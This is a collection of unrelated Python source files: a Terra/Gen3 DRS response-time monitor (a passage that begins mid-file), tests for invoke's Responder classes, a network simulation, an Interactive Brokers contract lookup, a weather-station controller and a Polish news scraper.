headers=headers, data=data)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
class Gen3Methods(MonitoringUtilityMethods):
def __init__(self):
super().__init__()
self.gen3_info = DeploymentInfo.gen3_factory()
def get_gen3_drs_resolution(self, drs_uri: str = None) -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self.gen3_info.public_drs_uri
assert drs_uri.startswith("drs://")
object_id = drs_uri.split(":")[-1]
headers = {
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/ga4gh/drs/v1/objects/{object_id}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
@staticmethod
def _get_drs_access_id(drs_response: dict, cloud_uri_scheme: str) -> Optional[Any]:
for access_method in drs_response['access_methods']:
if access_method['type'] == cloud_uri_scheme:
return access_method['access_id']
return None
def get_gen3_drs_access(self, fence_user_token: str, drs_uri: str = None,
access_id: str = "gs") -> Tuple[dict, dict]:
if drs_uri is None:
drs_uri = self.gen3_info.public_drs_uri
assert drs_uri.startswith("drs://")
object_id = drs_uri.split(":")[-1]
headers = {
'authorization': f"Bearer {fence_user_token}",
'content-type': "application/json"
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/ga4gh/drs/v1/objects/{object_id}/access/{access_id}",
headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
access_url = resp.json().get('url') if resp.ok else None
return access_url, self.monitoring_info(start_time, resp)
def get_fence_userinfo(self, fence_user_token: str):
headers = {
'authorization': f"Bearer {fence_user_token}",
'content-type': "application/json",
'accept': '*/*'
}
start_time = time.time()
resp = requests.get(f"https://{self.gen3_info.gen3_host}/user/user/", headers=headers)
logger.debug(f"Request URL: {resp.request.url}")
resp_json = resp.json() if resp.ok else None
return resp_json, self.monitoring_info(start_time, resp)
class Scheduler:
def __init__(self):
super().__init__()
self.stop_run_continuously = None
@staticmethod
def run_continuously(interval=1):
"""Continuously run, while executing pending jobs at each
elapsed time interval.
@return cease_continuous_run: threading. Event which can
be set to cease continuous run. Please note that it is
*intended behavior that run_continuously() does not run
missed jobs*. For example, if you've registered a job that
should run every minute, and you set a continuous run
interval of one hour then your job won't be run 60 times
at each interval but only once.
"""
cease_continuous_run = threading.Event()
class ScheduleThread(threading.Thread):
def __init__(self):
super().__init__()
def run(self):
while not cease_continuous_run.is_set():
schedule.run_pending()
time.sleep(interval)
continuous_thread = ScheduleThread()
continuous_thread.start()
return cease_continuous_run
@staticmethod
def run_threaded(job_func):
job_thread = Thread(target=job_func)
job_thread.start()
def start_monitoring(self):
logger.info("Starting background response time monitoring")
self.stop_run_continuously = self.run_continuously()
def stop_monitoring(self):
logger.info("Stopping background response time monitoring")
self.stop_run_continuously.set()
def catch_exceptions(cancel_on_failure=False):
def catch_exceptions_decorator(job_func):
@functools.wraps(job_func)
def wrapper(*args, **kwargs):
# noinspection PyBroadException
try:
return job_func(*args, **kwargs)
except:
import traceback
logger.error(traceback.format_exc())
if cancel_on_failure:
return schedule.CancelJob
return wrapper
return catch_exceptions_decorator
class ResponseTimeMonitor(Scheduler):
interval_seconds = 30
def __init__(self):
super().__init__()
class AbstractResponseTimeReporter(ABC):
def __init__(self, output_filename):
super().__init__()
self.output_filename = output_filename
@abstractmethod
def measure_and_report(self):
pass
class DrsFlowResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods, Gen3Methods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
try:
terra_user_token = self.get_terra_user_pet_sa_token()
# Get DRS metadata from Gen3 Indexd
drs_metadata, mon_info = self.get_gen3_drs_resolution()
monitoring_infos['indexd_get_metadata'] = mon_info
# Get service account key from Bond
sa_key, mon_info = self.get_service_account_key_from_bond(terra_user_token)
monitoring_infos['bond_get_sa_key'] = mon_info
# Get Fence user token from Bond
fence_user_token, mon_info = self.get_fence_token_from_bond(terra_user_token)
monitoring_infos['bond_get_access_token'] = mon_info
assert fence_user_token is not None, "Failed to get Fence user token."
# Get signed URL from Fence
access_url, mon_info = self.get_gen3_drs_access(fence_user_token)
monitoring_infos['fence_get_signed_url'] = mon_info
except Exception as ex:
logger.warning(f"Exception occurred: {ex}")
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class MarthaResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
# Get Martha response time
resp_json, mon_info = self.get_martha_drs_response(terra_user_token)
monitoring_infos['martha'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class BondExternalIdentityResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
# Get Bond external identity link URL response time
link_url, mon_info = self.get_external_identity_link_url_from_bond()
monitoring_infos['bond_get_link_url'] = mon_info
# Get Bond external identity status response time
resp_json, mon_info = self.get_external_identity_status_from_bond(terra_user_token)
monitoring_infos['bond_get_link_status'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
class FenceUserInfoResponseTimeReporter(AbstractResponseTimeReporter, TerraMethods, Gen3Methods):
def __init__(self, output_filename):
super().__init__(output_filename)
def measure_response_times(self) -> dict:
monitoring_infos = dict()
terra_user_token = self.get_terra_user_pet_sa_token()
fence_user_token, _ = self.get_fence_token_from_bond(terra_user_token)
# Get Fence user info response time as a response time indicator for the
# Gen3 Fence k8s portition for auth services, which is separate
# from the partition for signed URL requests.
resp_json, mon_info = self.get_fence_userinfo(fence_user_token)
monitoring_infos['fence_user_info'] = mon_info
return monitoring_infos
def measure_and_report(self):
monitoring_infos = self.measure_response_times()
self.write_monitoring_info_to_csv(monitoring_infos, self.output_filename)
@catch_exceptions()
def check_drs_flow_response_times(self):
output_filename = "drs_flow_response_times.csv"
reporter = self.DrsFlowResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_martha_response_time(self):
output_filename = "martha_response_time.csv"
reporter = self.MarthaResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_bond_external_identity_response_times(self):
output_filename = "bond_external_idenity_response_times.csv"
reporter = self.BondExternalIdentityResponseTimeReporter(output_filename)
reporter.measure_and_report()
@catch_exceptions()
def check_fence_user_info_response_time(self):
output_filename = "fence_user_info_response_time.csv"
reporter = self.FenceUserInfoResponseTimeReporter(output_filename)
reporter.measure_and_report()
def configure_monitoring(self):
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_drs_flow_response_times)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_martha_response_time)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded,
self.check_bond_external_identity_response_times)
schedule.every(self.interval_seconds).seconds.do(super().run_threaded, self.check_fence_user_info_response_time)
def configure_logging(output_directory_path: str) -> logging.Logger:
log_filename = Path(os.path.join(output_directory_path, "monitor_response_times.log")).resolve().as_posix()
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(threadName)-12s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
filename=log_filename,
filemode="w",
level=logging.DEBUG)
logging.Formatter.converter = time.gmtime
print(f"Logging to file: {log_filename}")
return logging.getLogger()
def parse_arg_list(arg_list: list = None) -> argparse.Namespace:
utc_timestamp = datetime.utcnow().strftime("%Y%m%d_%H%M%S")
parser = argparse.ArgumentParser()
parser.add_argument('--project-name', type=str, required=True,
help="Project to monitor. Supported values: BDC")
parser.add_argument('--terra-deployment-tier', type=str, required=True,
help="Project to monitor. Supported values: DEV, ALPHA")
parser.add_argument('--output-dir', type=str, required=False,
default=f"./monitoring_output_{utc_timestamp}",
help="Directory to contain monitoring output files")
args = parser.parse_args(arg_list)
return args
def create_output_directory(directory_path: str) -> None:
Path(directory_path).mkdir(parents=True, exist_ok=True)
def set_configuration(args: argparse.Namespace) -> None:
global output_dir, logger
DeploymentInfo.set_project(args.project_name)
DeploymentInfo.set_terra_deployment_tier(args.terra_deployment_tier)
# Call these now to raise any errors now rather than later while running.
DeploymentInfo.terra_factory()
DeploymentInfo.gen3_factory()
create_output_directory(args.output_dir)
output_dir = args.output_dir
logger = configure_logging(args.output_dir)
logger.info("Monitoring Configuration:")
logger.info(f"Project: {args.project_name}")
logger.info(f"Terra Deployment Tier: {args.terra_deployment_tier}")
responseTimeMonitor: ResponseTimeMonitor = None
def main(arg_list: list = None) -> None:
args = parse_arg_list(arg_list)
set_configuration(args)
# Configure and start monitoring
global responseTimeMonitor
responseTimeMonitor = ResponseTimeMonitor()
responseTimeMonitor.configure_monitoring()
responseTimeMonitor.start_monitoring()
#
# Start/Stop monitoring in the current (callers) process
#
def start_monitoring_in_current_process(terra_deployment_tier: str,
project_to_monitor: str,
monitoring_output_directory: str) -> None:
arg_list = ["--terra-deployment-tier", terra_deployment_tier,
"--project", project_to_monitor,
"--output-dir", monitoring_output_directory]
main(arg_list)
def stop_monitoring_in_current_process() -> None:
global responseTimeMonitor
responseTimeMonitor.stop_monitoring()
#
# Start/Stop monitoring using a new background process
#
def start_monitoring_background_process(terra_deployment_tier: str,
project_to_monitor: str,
monitoring_output_directory: str)\
-> psutil.Process:
print("Starting monitoring background process ...")
process = psutil.Popen(["python3",
__file__,
"--terra-deployment-tier", terra_deployment_tier,
"--project", project_to_monitor,
"--output-dir", monitoring_output_directory])
print(f"Started {process}")
return process
def stop_monitoring_background_process(process: psutil.Process) -> None:
_termination_wait_seconds = 60
print("Stopping monitoring background process ...")
process.terminate()
print("Waiting up {_termination_wait_seconds} seconds for process to terminate.")
process.wait(_termination_wait_seconds)
print("Stopped monitoring background process.")
if __name__ == "__main__":
main()
# # Run for a while
# sleep_seconds = 90
# print(f"Sleeping for {sleep_seconds} ...")
# time.sleep(sleep_seconds)
# print("Done sleeping")
#
# # Stop monitoring
# responseTimeMonitor.stop_monitoring()
|
watchers.py
|
from threading import Thread, Event
from invoke.vendor.six.moves.queue import Queue, Empty
from invoke import Responder, FailingResponder, ResponseNotAccepted
# NOTE: StreamWatcher is basically just an interface/protocol; no behavior to
# test of its own. So this file tests Responder primarily, and some subclasses.
class Responder_:
def keeps_track_of_seen_index_per_thread(self):
# Instantiate a single object which will be used in >1 thread
r = Responder(pattern='foo', response='bar fight') # meh
# Thread body func allowing us to mimic actual IO thread behavior, with
# Queues used in place of actual pipes/files
def body(responder, in_q, out_q, finished):
while not finished.is_set():
try:
# NOTE: use nowait() so our loop is hot & can shutdown ASAP
# if finished gets set.
stream = in_q.get_nowait()
for response in r.submit(stream):
out_q.put_nowait(response)
except Empty:
pass
# Create two threads from that body func, and queues/etc for each
t1_in, t1_out, t1_finished = Queue(), Queue(), Event()
t2_in, t2_out, t2_finished = Queue(), Queue(), Event()
t1 = Thread(target=body, args=(r, t1_in, t1_out, t1_finished))
t2 = Thread(target=body, args=(r, t2_in, t2_out, t2_finished))
# Start the threads
t1.start()
t2.start()
try:
stream = 'foo fighters'
# First thread will basically always work
t1_in.put(stream)
assert t1_out.get() == 'bar fight'
# Second thread get() will block/timeout if threadlocals aren't in
# use, because the 2nd thread's copy of the responder will not have
# its own index & will thus already be 'past' the `foo` in the
# stream.
t2_in.put(stream)
assert t2_out.get(timeout=1) == 'bar fight'
except Empty:
assert False, "Unable to read from thread 2 - implies threadlocal indices are broken!" # noqa
# Close up.
finally:
t1_finished.set()
t2_finished.set()
t1.join()
t2.join()
def yields_response_when_regular_string_pattern_seen(self):
r = Responder(pattern='empty', response='handed')
assert list(r.submit('the house was empty')) == ['handed']
def yields_response_when_regex_seen(self):
r = Responder(pattern=r'tech.*debt', response='pay it down')
response = r.submit("technically, it's still debt")
assert list(response) == ['pay it down']
def multiple_hits_within_stream_yield_multiple_responses(self):
r = Responder(pattern='jump', response='how high?')
assert list(r.submit('jump, wait, jump, wait')) == ['how high?'] * 2
def patterns_span_multiple_lines(self):
r = Responder(pattern=r'call.*problem', response='So sorry')
output = """
You only call me
when you have a problem
You never call me
Just to say hi
"""
assert list(r.submit(output)) == ['So sorry']
class FailingResponder_:
def behaves_like_regular_responder_by_default(self):
r = FailingResponder(
pattern='ju[^ ]{2}',
response='how high?',
sentinel='lolnope',
)
assert list(r.submit('jump, wait, jump, wait')) == ['how high?'] * 2
def raises_failure_exception_when_sentinel_detected(self):
r = FailingResponder(
pattern='ju[^ ]{2}',
response='how high?',
sentinel='lolnope',
)
# Behaves normally initially
assert list(r.submit('jump')) == ['how high?']
# But then!
try:
r.submit('lolnope')
except ResponseNotAccepted as e:
message = str(e)
# Expect useful bits in exception text
err = "Didn't see pattern in {!r}".format(message)
assert "ju[^ ]{2}" in message, err
err = "Didn't see failure sentinel in {!r}".format(message)
assert "lolnope" in message, err
else:
assert False, "Did not raise ResponseNotAccepted!"
|
simulation_2.py
|
'''
Created on Oct 12, 2016
@author: mwitt_000
'''
from src.Network import network_2
from src.Link import link_2
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_2.Host(1)
object_L.append(client)
server = network_2.Host(2)
object_L.append(server)
router_a = network_2.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_2.LinkLayer()
object_L.append(link_layer)
#add all the links
link_layer.add_link(link_2.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_2.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
client.udt_send(2, 'Sample data must be longer then 80 characters so we added this additional text to achieve that requirement.',
link_layer.link_L[1].mtu)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
request_contract_details.py
|
# Copyright (C) 2019 LYNX B.V. All rights reserved.
# Import ibapi deps
from ibapi import wrapper
from ibapi.client import EClient
from ibapi.contract import *
from threading import Thread
from datetime import datetime
from time import sleep
CONTRACT_ID = 4001
class Wrapper(wrapper.EWrapper):
def __init__(self):
wrapper.EWrapper.__init__(self)
def contractDetails(self, reqId:int, contractDetails:ContractDetails):
"""Receives the full contract's definitions. This method will return all
contracts matching the requested via EEClientSocket::reqContractDetails.
For example, one can obtain the whole option chain with it."""
print("marketName: ", contractDetails.marketName, "\nvalidExchanges: ", contractDetails.validExchanges,\
"\nlongName: ", contractDetails.longName, "\nminTick: ",contractDetails.minTick)
#printinstance(contractDetails) using this print statement all of the availabe details will be printed out.
class Client(EClient):
def __init__(self, wrapper):
EClient.__init__(self, wrapper)
def get_contractDetails(self, contract, reqId = CONTRACT_ID):
# Here we are requesting contract details for the EUR.USD Contract
self.reqContractDetails(reqId, contract)
MAX_WAITED_SECONDS = 5
print("Getting contract details from the server... can take %d second to complete" % MAX_WAITED_SECONDS)
sleep(MAX_WAITED_SECONDS)
class TestApp(Wrapper, Client):
def __init__(self, ipaddress, portid, clientid):
Wrapper.__init__(self)
Client.__init__(self, wrapper=self)
self.connect(ipaddress, portid, clientid)
thread = Thread(target=self.run)
thread.start()
setattr(self, "_thread", thread)
def printinstance(inst:Object):
attrs = vars(inst)
print('\n'.join("%s: %s" % item for item in attrs.items()))
def main():
app = TestApp("localhost", 7496, clientid = 0)
print("serverVersion:%s connectionTime:%s" % (app.serverVersion(),
app.twsConnectionTime()))
# Define the contract
contract = Contract()
contract.symbol = "EUR"
contract.secType = "CASH"
contract.currency = "USD"
contract.exchange = "IDEALPRO"
app.get_contractDetails(contract)
if __name__ == "__main__":
main()
|
hauptlogik.py
|
# -*- coding: utf-8 -*-
import displayController, sensorenController, ledController, schalterController, speicherung
import time, math
from apscheduler.schedulers.blocking import BlockingScheduler
from threading import Thread
versionNummer = "1.0"
displayModus = 0 #0 = Backlight aus + LED an; 1 = Backlight aus + LED aus; 2 = Backlight an + LED an; 3 = Backlight an + LED aus; 4 = Display aus + LED an; 5 = Display aus + LED aus
def start():
ledController.starten()
schalterController.starten()
displayController.startAnimation(versionNummer)
speicherung.mitMySQLVerbinden()
def aktualisieren():
[temperatur, druck, seehoehe, feuchtigkeit] = sensorenController.leseDaten()
displayController.datenAnzeige(round(temperatur,1), round(druck,1), round(seehoehe,1), feuchtigkeit)
speicherung.datenBereinigen()
speicherung.datenSpeichern(round(temperatur,3), round(druck,3), feuchtigkeit)
def schalterUeberpruefung():
while(True):
schalterController.warteAufSchalterGedrueckt()
displayModusAendern()
time.sleep(0.5)
def displayModusAendern():
global displayModus
if displayModus < 5:
displayModus += 1
else:
displayModus = 0
displayController.displayModusAendern(displayModus)
if displayModus == 1 or displayModus == 3 or displayModus == 5:
sensorenController.benutzeLED = False
speicherung.benutzeLED = False
else:
sensorenController.benutzeLED = True
speicherung.benutzeLED = True
Thread(target=schalterUeberpruefung).start() #Ruft asyncron schalterUeberpruefung auf.
#Konfiguriert das Script so, dass aktualisieren jeden vollen 10 Sekunden einer Minute aufgerufen wird.
start()
scheduler = BlockingScheduler()
scheduler.add_job(aktualisieren, trigger='cron', second='0,10,20,30,40,50')
scheduler.start()
|
test.py
|
from Country.Poland.News.WiadomosciGazetaPl.NewsScraper import NewsScraper
from LanguageProcessing.Translation.GoogleTranslator import GoogleTranslator
from Scraper.Writters.FileWritter import FileWriter
from Requests.Requester import Requester
from threading import Thread
translator = GoogleTranslator()
# today news http://wiadomosci.gazeta.pl/wiadomosci/0,114871.html
def getArticle(url, dataset):
requester = Requester(url=url, retries=5, sleep_time=3)
response = requester.make_get_request()
html = response.data
dataset[url]["subtitle"] = (NewsScraper.parse_article_subtitle(html=html))
dataset[url]["date"] = (NewsScraper.parse_article_datetime(html=html))
dataset[url]["text"], dataset[url]["html"] = (NewsScraper.parse_article_text(html=html))
try:
translation_result = translator.get_translation(dataset[url]["text"])
dataset[url]["translation_en"] = translation_result['translation']
except Exception:
print("Translation error with url {0} and text {1}".format(url, dataset[url]["text"]))
def getNewsDataset(pages):
dataset = dict()
for page in range(pages):
url = "http://wiadomosci.gazeta.pl/wiadomosci/0,114871.html?str="+str(page+1)
requester = Requester(url=url, retries=5, sleep_time=3)
response = requester.make_get_request()
html = response.data
dataset.update(NewsScraper.parse_articles_list(url_root=requester.get_url_root(),html=html))
threads=[]
for article in dataset:
url = article
threads.append(Thread(target=getArticle, args=(url, dataset)))
threads[-1].start()
for thread in threads:
thread.join()
return dataset
writer = FileWriter("data/news.csv")
writer.write(getNewsDataset(1))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.